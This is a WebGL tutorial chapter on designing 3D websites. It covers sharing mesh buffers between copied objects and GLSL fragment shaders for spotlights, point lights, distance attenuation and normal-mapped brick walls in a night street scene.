There is no adopted style for a 3D website. No metaphor can best describe the process of designing the 3D web. Perhaps what we know most is what does not work. Often, our initial concept is to model the real world. An early design from years ago involved a university that wanted to use its campus map to navigate through its website. One found oneself dragging the mouse repeatedly, as fast as one could, just to get to the other side of campus. A better design would have been a bookshelf where everything was in front of you. To view the chemistry department, just grab the chemistry book and click on the virtual pages to view the faculty, curriculum, and other department information. Also, if you needed to cross-reference this with the math department's upcoming schedule, you could just grab the math book. Each attempt adds to our knowledge and gets us closer to something better.

What we know is what most other applications of computer graphics learned: reality might be a starting point, but we should not let it interfere with creativity. 3D for the sake of recreating the real world limits our innovative potential. Starting from this point, strip out the parts bound by physics, such as support beams or poles that serve no purpose in a virtual world. Such items make the rendering slower just by existing. Once we break these bounds, the creative process takes over: perhaps a whimsical version, a parody, something dark and scary, or a world that emphasizes story. Characters in video games and animated movies take on stylized features. The characters are purposely unrealistic or exaggerated. Some of the best animations to exhibit this are Chris Landreth's The Spine, Ryan (Academy Award for Best Animated Short Film in 2004), and his earlier work in psychologically driven animation, where the characters break apart under the ravages of personal failure (https://www.nfb.ca/film/ryan).
This demonstration will describe some of the more difficult technical issues involved with lighting, normal maps, and the efficient sharing of 3D models. The following scene uses 3D models and texture maps from previous demonstrations, but with techniques that are more complex.

Engage thrusters

This scene has two lampposts and three brick walls, yet we only read in the texture map and 3D mesh for one of each and then reuse the same models several times. This has the obvious advantage that we do not need to read in the same 3D models several times, thus saving download time and using less memory. A new function, copyObject(), was created that currently sits inside the main WebGL file, although it can be moved to mesh3dObject.js. In webGLStart(), after the original objects are created, we call copyObject(), passing along the original object with the unique name, location, rotation, and scale. In the following code, we copy the original streetLight0Object into a new streetLight1Object:

streetLight1Object = copyObject( streetLight0Object, "streetLight1",
    streetLight1Location, [1, 1, 1], [0, 0, 0] );

Inside copyObject(), we first create the new mesh and then set the unique name, location (translation), rotation, and scale:

function copyObject(original, name, translation, scale, rotation) {
    meshObjectArray[ totalMeshObjects ] = new meshObject();
    newObject = meshObjectArray[ totalMeshObjects ];
    newObject.name = name;
    newObject.translation = translation;
    newObject.scale = scale;
    newObject.rotation = rotation;

The object to be copied is named original.
We will not need to set up new buffers since the new 3D mesh can point to the same buffers as the original object:

newObject.vertexBuffer = original.vertexBuffer;
newObject.indexedFaceSetBuffer = original.indexedFaceSetBuffer;
newObject.normalsBuffer = original.normalsBuffer;
newObject.textureCoordBuffer = original.textureCoordBuffer;
newObject.boundingBoxBuffer = original.boundingBoxBuffer;
newObject.boundingBoxIndexBuffer = original.boundingBoxIndexBuffer;
newObject.vertices = original.vertices;
newObject.textureMap = original.textureMap;

We do need to create a new bounding box matrix since it is based on the new object's unique location, rotation, and scale. In addition, meshLoaded is set to false. At this stage, we cannot determine whether the original mesh and texture map have been loaded since that is done in the background:

newObject.boundingBoxMatrix = mat4.create();
newObject.meshLoaded = false;
totalMeshObjects++;
return newObject;
}

There is just one more inclusion, inside drawScene(), to inform us that the original 3D mesh and texture map(s) have been loaded:

streetLightCover1Object.meshLoaded = streetLightCover0Object.meshLoaded;
streetLightCover1Object.textureMap = streetLightCover0Object.textureMap;

This is set each time a frame is drawn, and is thus redundant once the mesh and texture map have been loaded, but the additional code is a very small hit in performance. Similar steps are performed for the original brick wall and its two copies.

Most of the scene is programmed using fragment shaders. There are four lights: the two streetlights, the neon Products sign, and the moon, which sets and rises. The brick wall uses normal maps. However, it is more complex here with the use of spotlights and light attenuation, where the light fades over a distance. The faint moonlight, however, does not fade over a distance.
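To recap the sharing technique before moving on to the shaders, here is a minimal, hypothetical sketch (not the demo's actual code) of why copyObject() is cheap: the copy holds references to the original's buffers rather than cloning them, so only per-instance data such as the transform is allocated anew.

```javascript
// A stripped-down copyObject(): the copy shares the original's GPU
// buffer and texture references; only the transform fields are new.
function copyObject(original, name, translation, scale, rotation) {
  return {
    name: name,
    translation: translation,
    scale: scale,
    rotation: rotation,
    vertexBuffer: original.vertexBuffer, // shared reference, not a clone
    textureMap: original.textureMap,     // shared reference, not a clone
    meshLoaded: false                    // unknown until the background load ends
  };
}

// Stand-in objects for the demo's street lights.
const streetLight0Object = { vertexBuffer: { id: "vbo-0" }, textureMap: { id: "tex-0" } };
const streetLight1Object = copyObject(
  streetLight0Object, "streetLight1", [1, 1, 1], [1, 1, 1], [0, 0, 0]
);

// Both objects point at the very same buffer in memory.
console.log(streetLight1Object.vertexBuffer === streetLight0Object.vertexBuffer); // true
```

The reference equality at the end is the whole point: drawing the copy reuses the data already uploaded for the original.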
Opening scene with four light sources: two streetlights, the Products neon sign, and the moon

This program has only three shaders: LightsTextureMap, used by the brick wall with a texture normal map; Lights, used for any object that is illuminated by one or more lights; and Illuminated, used by the light sources such as the moon, neon sign, and streetlight covers. The simplest of these fragment shaders is Illuminated. It consists of a texture map and the illuminated color, uLightColor. For many objects, the texture map would simply be a white placeholder. However, the moon uses a texture map, available for free from NASA, that must be merged with its color:

vec4 fragmentColor = texture2D(uSampler,
    vec2(vTextureCoord.s, vTextureCoord.t));
gl_FragColor = vec4(fragmentColor.rgb * uLightColor, 1.0);

The light color also serves another purpose, as it will be passed on to the other two fragment shaders, since each adds its own individual color: off-white for the streetlights, gray for the moon, and pink for the neon sign. The next step is to use the shaderLights fragment shader. We begin by setting the ambient light, which is a dim light added to every pixel, usually about 0.1, so nothing is pitch black.
Then, for each of our four light sources (two streetlights, the moon, and the neon sign), we make a call to the calculateLightContribution() function:

void main(void) {
    vec3 lightWeighting = vec3(uAmbientLight, uAmbientLight, uAmbientLight);
    lightWeighting += uStreetLightColor *
        calculateLightContribution(uSpotLight0Loc, uSpotLightDir, false);
    lightWeighting += uStreetLightColor *
        calculateLightContribution(uSpotLight1Loc, uSpotLightDir, false);
    lightWeighting += uMoonLightColor *
        calculateLightContribution(uMoonLightPos, vec3(0.0, 0.0, 0.0), true);
    lightWeighting += uProductTextColor *
        calculateLightContribution(uProductTextLoc, vec3(0.0, 0.0, 0.0), true);

All four calls to calculateLightContribution() are multiplied by the light's color (white for the streetlights, gray for the moon, and pink for the neon sign). The parameters of calculateLightContribution(vec3, vec3, bool) are the location of the light, its direction, and a point-light flag. This flag is true for a point light that illuminates in all directions, or false for a spotlight that points in a specific direction. Since point lights such as the moon or neon sign have no direction, their direction parameter is not used and is set to a default, vec3(0.0, 0.0, 0.0).

The vec3 lightWeighting value accumulates the red, green, and blue light colors at each pixel. However, these values cannot exceed the maximum of 1.0 for red, green, and blue. Colors greater than 1.0 produce unpredictable results depending on the graphics card, so the red, green, and blue light colors must be capped at 1.0:

if ( lightWeighting.r > 1.0 ) lightWeighting.r = 1.0;
if ( lightWeighting.g > 1.0 ) lightWeighting.g = 1.0;
if ( lightWeighting.b > 1.0 ) lightWeighting.b = 1.0;

Finally, we calculate the pixels based on the texture map.
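The accumulate-and-clamp step above can be sketched in plain JavaScript. This is a hypothetical model, with names of our own choosing; the shader works per pixel on GLSL vec3 values, which we represent here as three-element arrays.

```javascript
// Accumulate light contributions on top of the ambient term, then cap
// each color channel at 1.0, mirroring the shader's three if statements.
function accumulateLight(ambient, contributions) {
  const weighting = [ambient, ambient, ambient]; // start at the ambient level
  for (const { color, amount } of contributions) {
    for (let i = 0; i < 3; i++) {
      weighting[i] += color[i] * amount; // light color scaled by its contribution
    }
  }
  return weighting.map(c => Math.min(c, 1.0)); // clamp each channel to 1.0
}

// Two strong lights can push a channel past 1.0; the clamp keeps it valid.
const w = accumulateLight(0.1, [
  { color: [1.0, 1.0, 1.0], amount: 0.6 }, // a white streetlight
  { color: [1.0, 0.4, 0.7], amount: 0.5 }, // a pink neon sign
]);
console.log(w); // red and blue are clamped at 1.0; green stays below
```

Without the clamp, red would reach 1.2 here, which is exactly the out-of-range situation the shader guards against.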
Only the street and streetlight posts use this shader, and neither has any tiling, but the multiplication by uTextureMapTiling was included in case there was tiling. The fragmentColor based on the texture map is multiplied by lightWeighting, the accumulation of our four light sources, for the final color of each pixel:

vec4 fragmentColor = texture2D(uSampler,
    vec2(vTextureCoord.s*uTextureMapTiling.s,
         vTextureCoord.t*uTextureMapTiling.t));
gl_FragColor = vec4(fragmentColor.rgb * lightWeighting.rgb, 1.0);
}

In the calculateLightContribution() function, we begin by determining the angle between the light's direction and the pixel's normal. The dot product is the cosine of the angle between the light's direction to the pixel and the pixel's normal, which is also known as Lambert's cosine law (http://en.wikipedia.org/wiki/Lambertian_reflectance):

vec3 distanceLightToPixel = vec3(vPosition.xyz - lightLoc);
vec3 vectorLightPosToPixel = normalize(distanceLightToPixel);
vec3 lightDirNormalized = normalize(lightDir);
float angleBetweenLightNormal = dot( -vectorLightPosToPixel, vTransformedNormal );

A point light shines in all directions, but a spotlight has a direction and an expanding cone of light surrounding this direction. For a pixel to be lit by a spotlight, that pixel must be in this cone of light.
This is the beam width area, where the pixel receives the full amount of light; the light then fades out towards the cut-off angle, beyond which no more light comes from this spotlight:

With texture maps removed, we reveal the value of the dot product between the pixel normal and the direction of the light

if ( pointLight ) {
    lightAmt = 1.0;
}
else {
    // spotlight
    float angleLightToPixel = dot( vectorLightPosToPixel, lightDirNormalized );
    // note, uStreetLightBeamWidth and uStreetLightCutOffAngle
    // are the cosines of the angles, not actual angles
    if ( angleLightToPixel >= uStreetLightBeamWidth ) {
        lightAmt = 1.0;
    }
    else if ( angleLightToPixel > uStreetLightCutOffAngle ) {
        lightAmt = (angleLightToPixel - uStreetLightCutOffAngle) /
            (uStreetLightBeamWidth - uStreetLightCutOffAngle);
    }
}

After determining the amount of light at that pixel, we calculate attenuation, which is the fall-off of light over a distance. Without attenuation, the light is constant. The moon has no light attenuation since it is dim already, but the other three lights fade out towards a maximum distance. The float maxDist = 15.0; value says that after 15 units, there is no more contribution from this light. If we are less than 15 units away from the light, the amount of light is reduced proportionately. For example, a pixel 10 units away from the light source receives (15-10)/15, or 1/3, the amount of light:

attenuation = 1.0;
if ( uUseAttenuation ) {
    if ( length(distanceLightToPixel) < maxDist ) {
        attenuation = (maxDist - length(distanceLightToPixel))/maxDist;
    }
    else
        attenuation = 0.0;
}

Finally, we multiply the values that make up the light contribution, and we are done:

lightAmt *= angleBetweenLightNormal * attenuation;
return lightAmt;

Next, we must account for the brick wall's normal map using the shaderLightsNormalMap-fs fragment shader. The normal is equal to rgb * 2 - 1. For example, rgb (1.0, 0.5, 0.0), which is orange, would become the normal (1.0, 0.0, -1.0).
This normal is converted to a unit value, or normalized, to (0.707, 0, -0.707):

vec4 textureMapNormal = vec4(
    (texture2D(uSamplerNormalMap,
        vec2(vTextureCoord.s*uTextureMapTiling.s,
             vTextureCoord.t*uTextureMapTiling.t)) * 2.0) - 1.0 );
vec3 pixelNormal = normalize(uNMatrix * normalize(textureMapNormal.rgb) );

A normal mapped brick (without the red brick texture image) reveals how changing the pixel normal alters the shading with various light sources

We call the same calculateLightContribution() function, but we now pass along pixelNormal, calculated using the normal texture map:

calculateLightContribution(uSpotLight0Loc, uSpotLightDir, pixelNormal, false);

From here, much of the code is the same, except that we use pixelNormal in the dot product to determine the angle between the normal and the light sources:

float angleLightToTextureMap = dot( -vectorLightPosToPixel, pixelNormal );

Now, angleLightToTextureMap replaces angleBetweenLightNormal because we are no longer using the vertex normal embedded in the 3D mesh's .obj file; instead, we use the pixel normal derived from the normal texture map file, brickNormalMap.png.

A normal mapped brick wall with various light sources

Objective complete – mini debriefing

This comprehensive demonstration combined multiple spot and point lights, shared 3D meshes instead of loading the same 3D meshes repeatedly, and deployed normal texture maps for a real 3D brick wall appearance. The next step is to build upon this demonstration, inserting links to web pages found on a typical website. In this example, we just identified a location for Products using a neon sign to catch the users' attention. As a 3D website is built, we will need better ways to navigate this virtual space, and this is covered in the following section.
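The lighting math walked through in this demonstration can be summarized in a plain-JavaScript sketch. All function names here are ours, chosen for illustration; the shader versions operate on GLSL vec3 values and uniforms rather than arrays.

```javascript
// Decode a normal-map texel: remap rgb from [0, 1] to [-1, 1] with
// rgb * 2 - 1, then normalize the result to unit length.
function decodeNormal(rgb) {
  const n = rgb.map(c => c * 2.0 - 1.0);
  const len = Math.hypot(n[0], n[1], n[2]);
  return n.map(c => c / len);
}

// Spotlight cone: full light inside the beam, a linear fade between the
// beam width and the cut-off, and nothing outside the cone. As in the
// shader uniforms, beamWidth and cutOff are cosines of angles.
function spotlightAmount(cosAngle, beamWidth, cutOff) {
  if (cosAngle >= beamWidth) return 1.0;
  if (cosAngle > cutOff) return (cosAngle - cutOff) / (beamWidth - cutOff);
  return 0.0;
}

// Linear distance attenuation: no contribution at or beyond maxDist.
function attenuation(distance, maxDist) {
  if (distance >= maxDist) return 0.0;
  return (maxDist - distance) / maxDist;
}

// The orange texel (1.0, 0.5, 0.0) becomes roughly (0.707, 0, -0.707).
console.log(decodeNormal([1.0, 0.5, 0.0]));
// A pixel 10 units from a light with maxDist 15 receives one third of its light.
console.log(attenuation(10, 15));
```

Multiplying the Lambert cosine term, the spotlight amount, and the attenuation, as the shader's last line does, gives the final contribution of one light at one pixel.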